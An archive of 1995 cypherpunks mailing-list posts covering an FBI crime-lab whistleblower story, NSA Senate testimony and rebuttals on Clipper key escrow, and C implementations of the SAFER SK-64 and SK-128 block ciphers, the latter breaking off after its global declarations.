"To date, no evidence tampering, evidence fabrication or failure to report exculpatory evidence have been found," the FBI said in a statement Wednesday. "Any findings of such misconduct will result in tough and swift action by the FBI."

Special Agent Frederic Whitehurst, who made the allegations and was interviewed Wednesday night on ABC-TV's "Primetime Live" program, labeled the FBI statement "garbage."

"I am obviously disagreeing with my superiors in this matter.
This report is garbage. ... It's garbage. I personally know about the review of those 250 cases," Whitehurst said. Whitehurst said he was under orders not to discuss specific cases.

Defense lawyers want to call Whitehurst as a witness at the O.J. Simpson murder trial in Los Angeles because he has claimed that FBI agent Roger Martz, who gave testimony damaging to Simpson, has slanted evidence in testimony in other cases.

Asked if there had been evidence tampering at the FBI lab, Whitehurst told ABC, "Yes, I believe there has been evidence tampering." He said he would testify at the Simpson trial "if the FBI orders me to go."

Martz could not be reached for comment. There was no answer at the office phones of either Martz or Whitehurst late Wednesday. Their home phone numbers could not be found.

The FBI said Whitehurst had, over the past several years, raised "a variety of concerns about forensic protocols and procedures employed in the FBI Laboratory," and that the bureau or the inspector general's office of the Justice Department, or both, had "vigorously investigated" his concerns in all instances and were continuing to do so.

The FBI said its laboratory examinations at trials are "constantly subject to extraordinarily vigorous challenge through cross-examination and the presentation of expert testimony by defense witnesses."

Whitehurst told ABC he was speaking out because it was his duty as an FBI agent. "I swore to uphold the constitution of the United States, and I swore to enforce the law. There was no caveat in that swearing -- if I caught persons with badges I would turn my back. I am an FBI agent. It's my duty," he said.

Whitehurst testified last month at the terrorism trial of Sheik Omar Abdel-Rahman and nine other Muslims accused of plotting to bomb the United Nations building and other New York City landmarks that he was pressured to distort findings about the 1993 World Trade Center bombing to favor prosecutors.
Citing a series of internal memos sent by Whitehurst to his FBI supervisors, ABC said the agent listed "one example after another of what he calls perjury, fraud, even the fabrication of evidence" in cases at the crime lab going back at least five years. One of the cases, ABC said, involved a 1991 Georgia mail-bombing that killed a federal judge and a civil rights lawyer. It was investigated by Louis Freeh, now the FBI director. Walter LeRoy Moody Jr. was convicted in the deaths. ABC said Whitehurst alleges that two agents in that case, one of whom was Martz, slanted evidence by testifying about tests that weren't done and scientific conclusions they couldn't support. The FBI lab was used to analyze blood evidence involving Simpson. Martz, a toxicologist, was called by the defense, but was declared a hostile witness. He testified that blood on a sock from Simpson's bedroom and from the crime scene showed only vague signs of a preservative. Simpson's lawyers say the blood was planted and the presence of the preservative proved it. While testifying in New York Aug. 14, Whitehurst said Martz was among several FBI investigators who concluded the World Trade Center bomb was urea-nitrate-based even though it was impossible to prove that scientifically because the substance is so common. After Whitehurst complained to his superiors, he said, reports about the bomb were corrected. He said they were accurate when they were introduced at last year's World Trade Center trial, which resulted in convictions for followers of Abdel-Rahman. At the terror conspiracy trial, Whitehurst said when he first told his supervisor about the errors, the supervisor "advised us that he would now have to embarrass his chemistry toxicology unit chief and that we were never, ever again to do something like that to him." 
Later, Whitehurst said, the supervisor told him he had been instructed by his bosses to have Whitehurst change his reports, and debates within the FBI about the evidence continued throughout the year. Whitehurst, the FBI's main explosives-residue analyst at the time of the bombing, said he has since been demoted and assigned to analyze paint for forensic evidence. ----- From jamesd at echeque.com Thu Sep 14 08:25:06 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 14 Sep 95 08:25:06 PDT Subject: WAS_tem Message-ID: <199509141524.IAA00532@blob.best.net> >> The bill would expand the definition of child pornography >> to include any [...] >> image produced by any means, including electronically by >> computer, if it depicts or appears to depict a minor >> engaging in sexually explicit conduct. At 10:40 AM 9/14/95 -0400, Rev. Ben wrote: >If I'm reading this correctly, if I Photoshop a kids face onto the body >of the latest Playboy centerfold, I'm in violation of this proposed law? If you draw a picture using paintbrush of an underage person engaging in sexual conduct, you are in violation of this proposed legislation. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From samman-ben at CS.YALE.EDU Thu Sep 14 08:28:24 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Thu, 14 Sep 95 08:28:24 PDT Subject: WAS_tem Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 14 Sep 1995, James A. Donald wrote: > If you draw a picture using paintbrush of an underage person engaging > in sexual conduct, you are in violation of this proposed legislation. Doesn't that directly contradict the stated purpose of existing child porn regulation? 
That is, doesn't current statute exist in order to prevent the exploitation of children, not to mandate morality? Do the lawyers on the list want to pipe up?

Ben.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMFhKCL5ALmeTVXAJAQG+eAMAstVn+sOOQkEI8ri6/jroSAwA8oCU5Fzu
qRQfeOCnWJxqEeCE75orzaXIJFTIG3+qWdbKlsYNqS5MglPfI70Iw0Iw3VEtbHRB
YZ595Aj6WXbBr3Z9SyR0mOCgN1twu2ds
=+t1l
-----END PGP SIGNATURE-----

From patrick at Verity.COM Thu Sep 14 08:28:51 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 14 Sep 95 08:28:51 PDT
Subject: NSA on GAK
Message-ID: <9509141525.AA21098@cantina.verity.com>

I've reformatted this to make it easier to read...If you've already read it, then just delete it:)

~~~~~~~ Included reformatted stuff starts here --\/ ~~~~~~~~~~~~~~~~~~~~~~

URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt

----------

Note: The following answers were provided by NSA to the Senate Subcommittee on Technology and the Law in response to their follow-up questions to the May 3, 1994 hearings.

---------------------------

Senate Subcommittee on Technology and the Law
Hearing on the Administration's Key Escrow Encryption Standard

Written Questions for Vice Admiral McConnell, NSA

*Questions for Senator Pressler:

Q: Admiral, as you are aware, critics of the Administration's proposal argue that as a practical matter, no criminal, foreign spy, or terrorist of any sophistication would be foolish enough to use an encryption device designed by the NSA and approved by the FBI. How do you respond? Why do[n't you] think the people whose telecommunications the NSA and the FBI want most to decode will be the very people most unlikely to use this technology?

Answer: From what we know today, the overriding requirement that spies, terrorists, and criminals have is for readily available and easy to use equipment that interoperates. Key escrow encryption is not meant to be a tool to catch criminals.
It will make excellent encryption available to legitimate businesses and private citizens without allowing criminals to use the telecommunications system to plan and commit crimes with impunity. We believe it would be irresponsible for government to make excellent encryption broadly available knowing that its use by criminals would make it impossible for law enforcement agencies to conduct lawful wiretaps against them. The Department of Justice credits information gleaned through wiretaps as leading to more than 20,000 felony convictions since the early 1980s. This would not have been possible if the criminals had been using encryption systems the FBI could not break.

Without government action, however, this fortunate situation will change. At present most people, and most criminals, don't use encryption. However, there is an increasing public awareness of the value of encryption for protecting private personal and business communications. Increasing demand for encryption by the public will likely lead to the widespread use of some form of standardized encryption on the public telecommunications network. This development would have great benefits for the country. Legitimate businesses and private individuals could use the telecommunications system secure in the knowledge that their private information such as business records and credit card numbers could not be intercepted by third parties. But there is a down side. Criminals, terrorists, and others could also use the system to plan crimes, launder money, and the like, completely secure in the knowledge that law enforcement agencies could not listen to those communications. Just as legitimate businesses operate much more efficiently and effectively using the telecommunications system than they could without it, so will criminal enterprises be able to operate more efficiently and effectively if they no longer have to avoid using the telecommunications system.

The United States is faced with a choice.
We can sit back and watch as the emerging national information infrastructure becomes a valuable tool for criminals and terrorists to use to plan and carry out their activities with complete security, or we can take steps to maintain the current ability of government to conduct lawful wiretaps so that prudent criminals will have to find other less efficient ways to operate and foolish ones may be caught. Key escrow encryption is the latter option.

Q: Would widespread use of the Skipjack algorithm harm U.S. exports? Do you think it is unlikely foreign businesses will purchase American encryption technology if the U.S. Government holds a set of the decoding keys?

Answer: I do not believe that widespread use of key escrow encryption in the United States will harm U.S. exports. If it has any effect at all, it could increase exports somewhat. Key escrow encryption products provide another option for foreign purchasers that they have not had in the past; to the extent that foreigners do purchase key escrow encryption products, it will mean an increase in exports. Meanwhile, U.S. exporters are free to continue to sell the products they currently sell in foreign markets and to seek license approvals for new products.

It is difficult to predict the foreign market for U.S. key escrow encryption technology. Businesses that fear U.S. Government interception of their communications presumably would avoid products for which the U.S. Government holds keys. However, there are a number of reasons why foreign businesses might purchase them. One major reason would be to communicate securely with U.S. businesses that use them. In addition, the superior level of security provided by key escrow products (against all but lawful U.S. Government access) may make them attractive to foreign businesses that do not view U.S. Government access as a major concern.
While some prospective users abroad may steer clear of key escrow products because the United States will retain access, there may be many who believe they are unlikely to be targeted by U.S. intelligence in any case or for whom the superior security offered by key escrow encryption products against threats of greater concern may make key escrow products an attractive option. For example, a distributor of pay-TV programming may depend on encryption to ensure that only those viewers who pay for the service can decrypt the TV signal. Such a distributor probably would not be concerned about the threat of access by the United States Government, and might favor suitable key escrow encryption products over competing products that use weaker encryption algorithms.

Q: You were present when the previous panelist, Stephen Walker, described how present U.S. laws prohibit his company from exporting encryption products. As I understand it, Senator Murray's bill, S.1846, attempts to relax these export controls somewhat. Please give us your views on this legislation.

Answer: I support the Administration's position, as announced by the White House on February 4, that current export controls must remain in place and that regulatory changes should be implemented to speed exports and reduce the licensing burden on exporters. The bill you reference appears to be inconsistent with the Administration position. I would be happy to provide you further information on the Administration's reasons for maintaining the current export controls in an appropriate setting.

*Questions from Senator Murray:

Q: In my office in the Hart building this February, I downloaded from the Internet an Austrian program that uses DES encryption. This was on a laptop computer, using a modem over a phone line. The Software Publishers' Association says there are at least 120 DES or comparable programs world wide. However, U.S.
export control laws prohibit American exporters from selling comparable DES programs abroad. With at least 20 million people hooked up to the Internet, how do U.S. export controls actually prevent criminals, terrorists, or whoever from obtaining DES encryption software?

Answer: Serious users of encryption do not entrust their security to software distributed via networks or bulletin boards. There is simply too much risk that viruses, Trojan Horses, programming errors, and other security flaws may exist in such software which could not be detected by the user. Serious users of encryption, those who depend on encryption to protect valuable data and cannot afford to take such chances, instead turn to other sources in which they can have greater confidence. Such serious users include not only entities which may threaten U.S. national security interests, but also businesses and other major consumers of encryption products. Encryption software distribution via Internet, bulletin board, or modem does not undermine the effectiveness of encryption export controls.

[Primary written questions for Admiral McConnell]

1. The Defense Authorization Bill for Fiscal Year 1994 has authorized $800,000 to be spent by the National Research Council of the National Academy of Sciences to conduct a study of federal encryption policy. Can we wait to implement the key escrow encryption program until we have the benefit of the NRC's study? Do you think this study is necessary? Should this study be expedited?

Answer: We do not believe that we can wait until after the NRC study is completed in 1996 to begin implementation of the key escrow initiative. The information technology industry is dynamic and fast-moving, and to wait another two years or more would, we believe, jeopardize the success of the initiative.
Industry demand for encryption products is growing, and the technology is available now to meet that demand with encryption products that provide an outstanding level of security to the user conduct lawful wiretaps. To wait for the completion of the NRC study to other encryption products which would defeat lawful wiretaps. We believe that such a delay would not be in the best interest of the American people. Neither do we believe that the study should be expedited. For our part, we will carefully consider the conclusions of the NRC study. We expect that it will give very careful consideration to the issues, and we would not want the pressure of an unnecessarily short deadline to limit the study group's ability to produce the best report possible. 2. The Administration has said that it is continuing to restrict export of the most sophisticated encryption devices, in part, "because of the concerns of our allies who fear that strong encryption technology would inhibit their law enforcement capabilities." Do we really need to help our allies by prohibiting the export of strong American encryption products, since those same countries can simply control the encryption bought within their borders? Answer: Exports of encryption products are subject to review primarily to protect U.S. national interests, including national security, law enforcement, foreign policy, and other important interests. The law enforcement concerns of our allies are a consideration, especially as the ability of our allies to combat terrorism, drug trafficking, and other international law enforcement problems can have direct benefits to the United States. However, foreign law enforcement concerns do not drive our export control policy. We would continue to review encryption exports to protect U.S. national interests even if foreign law enforcement concerns disappeared. 3. 
Do you know whether foreign governments would be interested in importing key escrow encryption products to which they hold the decoding keys? Answer: Several foreign governments have expressed interest in key escrow encryption technology due to their own law enforcement concerns. There have been some preliminary discussions, but issues such as who would hold the escrowed keys and the circumstances of government access to escrowed keys must be fully vetted. 4. The Government wants the key escrow encryption standard to become the de facto industry standard in the United States. Would the Government abandon the Clipper Chip program if it is shown to be unsuccessful beyond government use? Answer: We do not expect the program to be unsuccessful beyond government. We have developed a sound security product that we expect will find many uses in government information systems and further believe that government use will bring with it a commercial market, particularly in the defense sector. We have developed a sound security product that we expect will find many uses in government information systems regardless of its success in commercial markets. 5. Openly available devices, such as Intel-compatible microprocessors, have seen dramatic gains, but only because everyone was free to try to build a better version. Given the restrictions on who can build devices with the classified skipjack algorithm, how will key escrow chips keep up with advances in semiconductor speed, power, capacity and integration? Answer: Despite the requirements that a firm must meet to produce key escrow encryption chips, we expect that there will be a number of manufacturers competing against each other to produce the best product, and that such competition will drive them to keep up with the latest technological advances. 
It is worth noting that only a few companies can produce the sophisticated microprocessors you reference, yet the competition in that market has driven them to achieve remarkable advances in that technology. NSA's STU-III secure telephone program provides an example of a cryptographic product line that keeps pace with technology. The presence of a classified algorithm does not preclude keeping pace with technology. Through NSA's use of a competitive, multi-vendor approach, STU-III secure telephone products have continued to evolve in response to user requirements and technological advances despite their use of a classified encryption algorithm and the consequent need for security restrictions on the manufacturers.

6. How well does the Skipjack algorithm work on telecommunications operating at very high speeds? Is NSA working on another algorithm, called BATON, that could be used in high speeds with a key escrow system? Will Capstone be compatible with BATON?

Answer: Using currently available microelectronics technology the SKIPJACK algorithm could not be used for encryption at very high speeds. BATON is the name of an algorithm developed by NSA that could be used at higher rates of speed. We have no plans to develop key escrow encryption devices using BATON, however. Instead, we are considering another algorithm for use at high speeds with a key escrow system. A high-speed key escrow device based on an algorithm other than SKIPJACK would not be "compatible with Capstone" in the sense that traffic encrypted by such a device could not be decrypted by Capstone, and vice versa. However, since such a device would be used for much higher-speed applications than those for which Capstone was designed, there would be no need for it to be compatible with Capstone in that sense.

7. Can Capstone be used to encrypt video programming? If so, have cable companies been approached by any government agency to use Capstone to scramble or encrypt cable programming?
Answer: Capstone could be used to encrypt any digital signal, including video programming, operating at up to about 10 million bits per second. It could be used for encrypting individual video channels but not for bulk encryption of many channels multiplexed together in a single link. NSA is not aware of any government agency approaching cable companies to urge the use of Capstone. Two manufacturers have asked us about the suitability of key escrow devices for this purpose, however.

8. Encryption software is available that can be used with Clipper to encrypt a message before or after it has been encrypted with Clipper. This "double encrypting" risks bypassing the key escrow feature. If a sender first encrypts the message with software using DES, and then transmits the message "double encrypted" with Clipper, can you tell from looking at the cipher, or encrypted text, that the underlying message was encrypted?

Answer: The only way to tell that a message has been "double encrypted" in this way would be to decrypt the "outer layer" of encryption, i.e. that done with Clipper. Only then would one be able to tell that the message had first been encrypted with something else.

----------

_______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/

From cme at TIS.COM Thu Sep 14 08:29:58 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 14 Sep 95 08:29:58 PDT
Subject: CYPHERPUNK considered harmful.
In-Reply-To: <199509132016.NAA02103@comsec.com>
Message-ID: <9509141511.AA05860@tis.com>

>From: "Peter Trei"
>Date: Wed, 13 Sep 1995 10:37:46 -6
>--------------------------------------------------------------
>
> Towards this goal, I have written a short Q&A that could be
>used as a model when discussing cryptography with non-cypherpunks.

>Q: Aren't LEAs worried that strong encryption will make it more
>difficult for them to catch crooks?

Yes, some are -- especially at higher levels. LEAs in the field (by my informal survey) are not. They're worried instead about manpower and normal tools (e.g., computers back at the station, radios, ...).

Meanwhile, there is an advantage for LEAs when criminals have, for example, encrypting phones. A phone itself gives the person using it a sense of privacy. [This is probably a side effect of the psychological cues which result from using a handset. If you pull a handset away from your ear or mouth very far, you can't converse. Someone standing in the same room as you probably can not hear the words you hear in your ear. If the handset were another person, this behavior would be called "whispering" -- something done to achieve privacy.]

An encrypting phone (or e-mail for that matter) gives the impression (and, to some extent, reality) of extra privacy. When there is a perception of privacy, the people conversing are more likely to reveal things which they don't want overheard. If these people are criminals, those things might be used as evidence against them. The advantage for LEAs comes from the fact that the person at the other end of the line might well be an LEA in disguise. This is especially true on the Internet (or on AOL, to cite a recent case), where the other person may well be someone you have never met and therefore haven't checked out to verify level of criminality.

>Q: What's this 'key escrow' thing?
>
>A: Some government agencies have been trying to figure out methods which
>simultaneously permit US citizens to use strong cryptography against
>criminal eavesdroppers, while retaining the ease with which LEAs can
>currently tap your calls. The schemes generally involve something
>mistitled 'key escrow', in which copies of cryptographic keys would be
>stored at sites accessible by LEAs.

'key escrow' is a code word for government access to the unencrypted message. It is a persistent theme, dating back to the NSA's CCEP in about 1987. 'key escrow' is also the name of a technique by which the most recent example of this access, Clipper/Capstone, achieved that government access. ( see http://www.clark.net/pub/cme/html/no-ke.html#etymology )

>Q: Why do you object to it?
>
>A: This is a bit as if your local police department ordered you to send
>them copies of all of your house, car, and office keys, so that they
>could enter whenever they felt it warranted, without your knowledge.
>
>Even assuming no keys will be leaked to criminals from such a valuable
>archive, it's an incredible boondoggle. The initial cost is tens of
>millions of dollars per year, by the most conservative government
>estimates. In reality, it's likely to be hundreds of millions a year,
>all to enable LEAs to investigate a type of crime which does not yet
>occur, and may never occur.

My preferred analogy so far (from http://www.clark.net/pub/cme/html/avss.html) is:

It is one thing to permit a police officer to look in an open window, see a criminal act in progress, start an investigation or make an arrest and use what he or she saw as evidence in an eventual trial of the perpetrators. It is something entirely different to prohibit people from using curtains on the grounds that curtains might prevent a police officer from seeing a criminal act in progress.

>- ------------------------------------------------------
>Cute signature quotes are needed.

There was a great one last week at NIST:

"Daddy ...
if your data is your own property, does it become less your property after you encrypt it?" [Speaker at the NIST workshop, September 6-7, 1995] - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ From fstuart at vetmed.auburn.edu Thu Sep 14 08:35:41 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Thu, 14 Sep 95 08:35:41 PDT Subject: An opportunity not to be missed Message-ID: <199509141535.KAA05557@snoopy.vetmed.auburn.edu> >> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for >> use through the remailers)? You could set up a web-page with instructions >> and a list of crimes for which there are rewards. > >Someone already tried that. The cops got a copy of the WWW logs and >started investigating everyone who'd looked at the WWW page... So at the >least you'd need a bunch of anonymous WWW proxies as well. Yuck. Well, if this is going to be a problem, you could distribute a periodic FAQ via Usenet instead. >There's also the problem that the current ecash systems do not provide >payee anonymity, so if you pay informers with ecash they can be traced if >the bank and payer collude. That's a real problem and underscores the need for better ecash. :) Frank Stuart | (Admiral Grace) Hopper's Law: fstuart at vetmed.auburn.edu | It's easier to get forgiveness than permission. From hroller at c2.org Thu Sep 14 09:12:58 1995 From: hroller at c2.org (Hroller Anonymous Remailer) Date: Thu, 14 Sep 95 09:12:58 PDT Subject: No Subject Message-ID: <199509141607.JAA25886@infinity.c2.org> /* SAFER SK-64 By James L. Massey who did not do this conversion and is not responsible for any bugs in it. 
   This is a 'C' conversion of the reference Turbo Pascal implementation.

   Examples of Encryption with SAFER SK-64
   (i.e., with the strengthened key schedule of 64 bits.)

   PLAINTEXT is        1   2   3   4   5   6   7   8
   The KEY is          0   0   0   0   0   0   0   1
   after round 1     131 177  53  27 130 249 141 121
   after round 2      68  73  32 102 134  54 206  57
   after round 3     248 213 217  11  23  68   0 243
   after round 4     194  62 109  79  24  18  13  84
   after round 5     153 156 246 172  40  72 173  39
   after round 6     154 242  34   6  61  35 216  28
   CRYPTOGRAM is      21  27 255   2 173  17 191  45

   PLAINTEXT is        1   2   3   4   5   6   7   8
   The KEY is          1   2   3   4   5   6   7   8
   after round 1     223  98 177 100  46 234  13 210
   after round 2     182 246 230  93 158  14  48  89
   after round 3      45 234 128 149  40 101  10 134
   after round 4      30  17 249 236 158 120  69 100
   after round 5       1 200 182 241   0 127 152 162
   after round 6     144  85  94 214   5  38  65 150
   CRYPTOGRAM is      95 206 155 162   5 132  56 199
*/

#include <stdio.h>

/* globals */
unsigned char a1,a2,a3,a4,a5,a6,a7,a8,   /* round input / output bytes */
              b1,b2,b3,b4,b5,b6,b7,b8,   /* intermediate bytes */
              r;                         /* number of rounds (1..10) */
unsigned char k[21][8], k1[9];           /* round keys; working key + parity byte */
int logtab[256], exptab[256], i, j, n;

/* 2-point Pseudo-Hadamard Transform: (p1,p2) -> (2*p1 + p2, p1 + p2) mod 256 */
void mat1(unsigned char p1, unsigned char p2, unsigned char *q1, unsigned char *q2)
{
    *q2 = p1 + p2;
    *q1 = *q2 + p1;
}

/* inverse PHT (needed for decryption; not exercised by this program) */
void invmat1(unsigned char p1, unsigned char p2, unsigned char *q1, unsigned char *q2)
{
    *q1 = p1 - p2;
    *q2 = -*q1 + p2;
}

void init_tables(void)
{
    /* This portion of the program computes the powers of the primitive
       element 45 of the finite field GF(257) and stores these numbers in
       the table "exptab".  The corresponding logarithms to the base 45
       are stored in the table "logtab". */
    logtab[1] = 0;
    exptab[0] = 1;
    for (i = 1; i <= 255; i++) {
        exptab[i] = (45 * exptab[i-1]) % 257;
        logtab[exptab[i]] = i;
    }
    /* 45^128 = 256 in GF(257); the byte value 0 stands in for 256 */
    exptab[128] = 0;
    logtab[0] = 128;
    exptab[0] = 1;
}

/* read one integer; returns 0 on success, -1 on EOF or malformed input */
static int read_int(int *v)
{
    return scanf("%d", v) == 1 ? 0 : -1;
}

int set_rounds(void)
{
    int rounds;
    do {
        printf("Enter number of rounds (max 10): ");
        if (read_int(&rounds) != 0) return -1;
    } while (rounds < 1 || rounds > 10);
    r = (unsigned char)rounds;
    return 0;
}

int get_plaintext(void)
{
    int v[8], m;
    printf("Enter plaintext as 8 bytes (0-255 separated by spaces)\n");
    for (m = 0; m < 8; m++)
        if (read_int(&v[m]) != 0) return -1;
    a1 = (unsigned char)v[0]; a2 = (unsigned char)v[1];
    a3 = (unsigned char)v[2]; a4 = (unsigned char)v[3];
    a5 = (unsigned char)v[4]; a6 = (unsigned char)v[5];
    a7 = (unsigned char)v[6]; a8 = (unsigned char)v[7];
    return 0;
}

int get_key(void)
{
    int v[8], m;
    printf("Enter key as 8 bytes (0-255 separated by spaces)\n");
    for (m = 0; m < 8; m++) {
        if (read_int(&v[m]) != 0) return -1;
        k[0][m] = k1[m] = (unsigned char)v[m];
    }
    return 0;
}

void key_schedule(void)
{
    /* append a "parity byte" to the key k1 */
    k1[8] = k1[0]^k1[1]^k1[2]^k1[3]^k1[4]^k1[5]^k1[6]^k1[7];
    /* derive keys k2, k3, ... k2r+1 from input key k1 */
    for (n = 2; n <= (2*r)+1; n++) {
        /* each byte of the key k1 is left rotated by 3 */
        for (j = 0; j <= 8; j++)
            k1[j] = (unsigned char)((k1[j] << 3) | (k1[j] >> 5));
        /* the key bias exp(exp(9n+j)) is added here to the rotated k1 */
        for (j = 1; j <= 8; j++)
            k[n-1][j-1] = k1[(j+n-2) % 9] + exptab[exptab[(9*n)+j]];
    }
}

void encrypt(void)
{
    for (i = 1; i <= r; i++) {
        /* Key 2i-1 is mixed bit and byte added to the round input */
        a1 = a1 ^ k[2*i-2][0];
        a2 = a2 + k[2*i-2][1];
        a3 = a3 + k[2*i-2][2];
        a4 = a4 ^ k[2*i-2][3];
        a5 = a5 ^ k[2*i-2][4];
        a6 = a6 + k[2*i-2][5];
        a7 = a7 + k[2*i-2][6];
        a8 = a8 ^ k[2*i-2][7];
        /* The result now passes through the nonlinear layer */
        b1 = exptab[a1]; b2 = logtab[a2]; b3 = logtab[a3]; b4 = exptab[a4];
        b5 = exptab[a5]; b6 = logtab[a6]; b7 = logtab[a7]; b8 = exptab[a8];
        /* Key 2i is now mixed byte and bit added to the result */
        b1 = b1 + k[2*i-1][0];
        b2 = b2 ^ k[2*i-1][1];
        b3 = b3 ^ k[2*i-1][2];
        b4 = b4 + k[2*i-1][3];
        b5 = b5 + k[2*i-1][4];
        b6 = b6 ^ k[2*i-1][5];
        b7 = b7 ^ k[2*i-1][6];
        b8 = b8 + k[2*i-1][7];
        /* The result now enters the linear layer (three PHT stages) */
        mat1(b1,b2,&a1,&a2); mat1(b3,b4,&a3,&a4);
        mat1(b5,b6,&a5,&a6); mat1(b7,b8,&a7,&a8);
        mat1(a1,a3,&b1,&b2); mat1(a5,a7,&b3,&b4);
        mat1(a2,a4,&b5,&b6); mat1(a6,a8,&b7,&b8);
        mat1(b1,b3,&a1,&a2); mat1(b5,b7,&a3,&a4);
        mat1(b2,b4,&a5,&a6); mat1(b6,b8,&a7,&a8);
        /* The round is now completed! */
        printf("after round %d %3d %3d %3d %3d %3d %3d %3d %3d\n",
               (int)i, a1,a2,a3,a4,a5,a6,a7,a8);
    }
    /* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */
    a1 = a1 ^ k[2*r][0];
    a2 = a2 + k[2*r][1];
    a3 = a3 + k[2*r][2];
    a4 = a4 ^ k[2*r][3];
    a5 = a5 ^ k[2*r][4];
    a6 = a6 + k[2*r][5];
    a7 = a7 + k[2*r][6];
    a8 = a8 ^ k[2*r][7];
}

int main(void)
{
    init_tables();
    for (;;) {
        /* stop at EOF or on malformed input instead of looping forever */
        if (set_rounds() != 0 || get_plaintext() != 0 || get_key() != 0)
            return 0;
        printf("PLAINTEXT is  %3d %3d %3d %3d %3d %3d %3d %3d\n",
               a1,a2,a3,a4,a5,a6,a7,a8);
        printf("THE KEY IS    %3d %3d %3d %3d %3d %3d %3d %3d\n",
               k[0][0],k[0][1],k[0][2],k[0][3],k[0][4],k[0][5],k[0][6],k[0][7]);
        key_schedule();
        encrypt();
        printf("CRYPTOGRAM IS %3d %3d %3d %3d %3d %3d %3d %3d\n\n",
               a1,a2,a3,a4,a5,a6,a7,a8);
    }
}

From adam at bwh.harvard.edu Thu Sep 14 09:12:58 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Thu, 14 Sep 95 09:12:58 PDT
Subject: NSA on GAK
In-Reply-To: <9509141525.AA21098@cantina.verity.com>
Message-ID: <199509141601.MAA06167@calloway.bwh.harvard.edu>

|
| Senate Subcommittee on Technology and the Law
| Hearing on the Administration's Key Escrow Encryption Standard
|
| Written Questions for Vice Admiral McConnell, NSA
| *Questions from Senator Murray:
|
| Q: In my office in the Hart building this February, I downloaded
| from the Internet an Austrian program that uses DES encryption.
[...]
| With at least 20 million people hooked up to the
| Internet, how do U.S. export controls actually prevent criminals,
| terrorists, or whoever from obtaining DES encryption software?
|
| Answer: Serious users of encryption do not entrust their
| security to software distributed via networks or bulletin boards.
| There is simply too much risk that viruses, Trojan Horses,
| programming errors, and other security flaws may exist in such
| software which could not be detected by the user.
| Serious users of
| encryption, those who depend on encryption to protect valuable data
| and cannot afford to take such chances, instead turn to other
| sources in which they can have greater confidence. Such serious
| users include not only entities which may threaten U.S. national
| security interests, but also businesses and other major consumers
| of encryption products. Encryption software distribution via
| Internet, bulletin board, or modem does not undermine the
| effectiveness of encryption export controls.

	"Help me understand here.  You say that serious users of
encryption don't use software distributed via network.  In that case,
you would have no objection to PGP being exported, as serious users of
encryption don't use it?"

From hroller at c2.org Thu Sep 14 09:19:58 1995
From: hroller at c2.org (Hroller Anonymous Remailer)
Date: Thu, 14 Sep 95 09:19:58 PDT
Subject: No Subject
Message-ID: <199509141614.JAA26330@infinity.c2.org>

/* SAFER SK-128 designed by James L. Massey who did not do this
   conversion and is not responsible for any bugs in it.

   This is a C conversion of the reference Turbo Pascal implementation.

   Examples of Encryption with SAFER SK-128
   (i.e., with the strengthened key schedule of 128 bits.)
   PLAINTEXT is     1   2   3   4   5   6   7   8
   KEY Ka is        0   0   0   0   0   0   0   1
   KEY Kb is        0   0   0   0   0   0   0   1
   after round 1  131 177  53  27 130 249 141 121
   after round 2   68  73  32 102 134  54 206  57
   after round 3  248 213 217  11  23  68   0 243
   after round 4  194  62 109  79  24  18  13  84
   after round 5  153 156 246 172  40  72 173  39
   after round 6  154 242  34   6  61  35 216  28
   after round 7  100  31 172  67  44  75 133 219
   after round 8   78 226 239 135 210  83  93  72
   after round 9   72  64  46 195 163 159 243 114
   after round10    3 133  76 190 191  52 220 123
   CRYPTOGRAM is   65  76  84  90 182 153  74 247

   PLAINTEXT is     1   2   3   4   5   6   7   8
   KEY Ka is        1   2   3   4   5   6   7   8
   KEY Kb is        0   0   0   0   0   0   0   0
   after round 1   64 214  74 216 103 222  26  54
   after round 2   61  14  68  15  46 111 124  80
   after round 3  197 124  96  59 255  24   2  30
   after round 4   63  59 214 103 236 166 153  24
   after round 5   66 254  26  45 152 223   5 122
   after round 6   89  47  58 105 161  38 135  45
   after round 7   19 202 174  44  57 206  52  25
   after round 8   78 179 113 208 169  26 121  22
   after round 9   53  17  81 215 120  37 206 246
   after round10  189 177   9   0 186  82 208 253
   CRYPTOGRAM is  255 120  17 228 179 167  46 113

   PLAINTEXT is     1   2   3   4   5   6   7   8
   KEY Ka is        0   0   0   0   0   0   0   0
   KEY Kb is        1   2   3   4   5   6   7   8
   after round 1   95 186 209 220 166  66 213  10
   after round 2  200  65 189 120  96 135  42 166
   after round 3   64 169  43 166 132 171  31  40
   after round 4  199 167  76 189 145 158 241  19
   after round 5   71  55 184 212 108 198  77 108
   after round 6  173 197 139  11  17  48  97  59
   after round 7   17  51 142   4 170   7 207 124
   after round 8   62 205 253 225 167 179 228 202
   after round 9  133 168 127 138 193 243  34 226
   after round10   59 194  69 220 220 231 123 148
   CRYPTOGRAM is   73 201 157 152 165 188  89   8
*/

#include <stdio.h>
#include <stdlib.h>

/* globals */
unsigned char a1,a2,a3,a4,a5,a6,a7,a8,
              b1,b2,b3,b4,b5,b6,b7,b8, r;
unsigned char k[25][8], ka[9], kb[9];
int logtab[256], exptab[256], i, j, n;

